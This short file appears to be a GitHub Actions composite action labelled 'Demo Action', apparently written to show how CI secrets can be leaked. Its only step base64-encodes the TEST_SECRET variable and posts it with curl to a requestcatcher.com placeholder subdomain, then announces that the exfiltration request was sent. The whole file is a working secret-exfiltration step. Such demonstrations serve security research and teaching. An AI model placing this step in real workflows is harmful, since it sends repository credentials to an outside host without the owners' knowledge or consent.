name: 'Demo Action'
description: 'Exfiltrate encoded secret'
runs:
  using: "composite"
  steps:
    - run: |
        encoded=$(echo -n "$TEST_SECRET" | base64)
        curl -s -d "secret=$encoded" https://<subdomain>.requestcatcher.com
        echo "::notice ::Exfiltration request sent."
      shell: bash
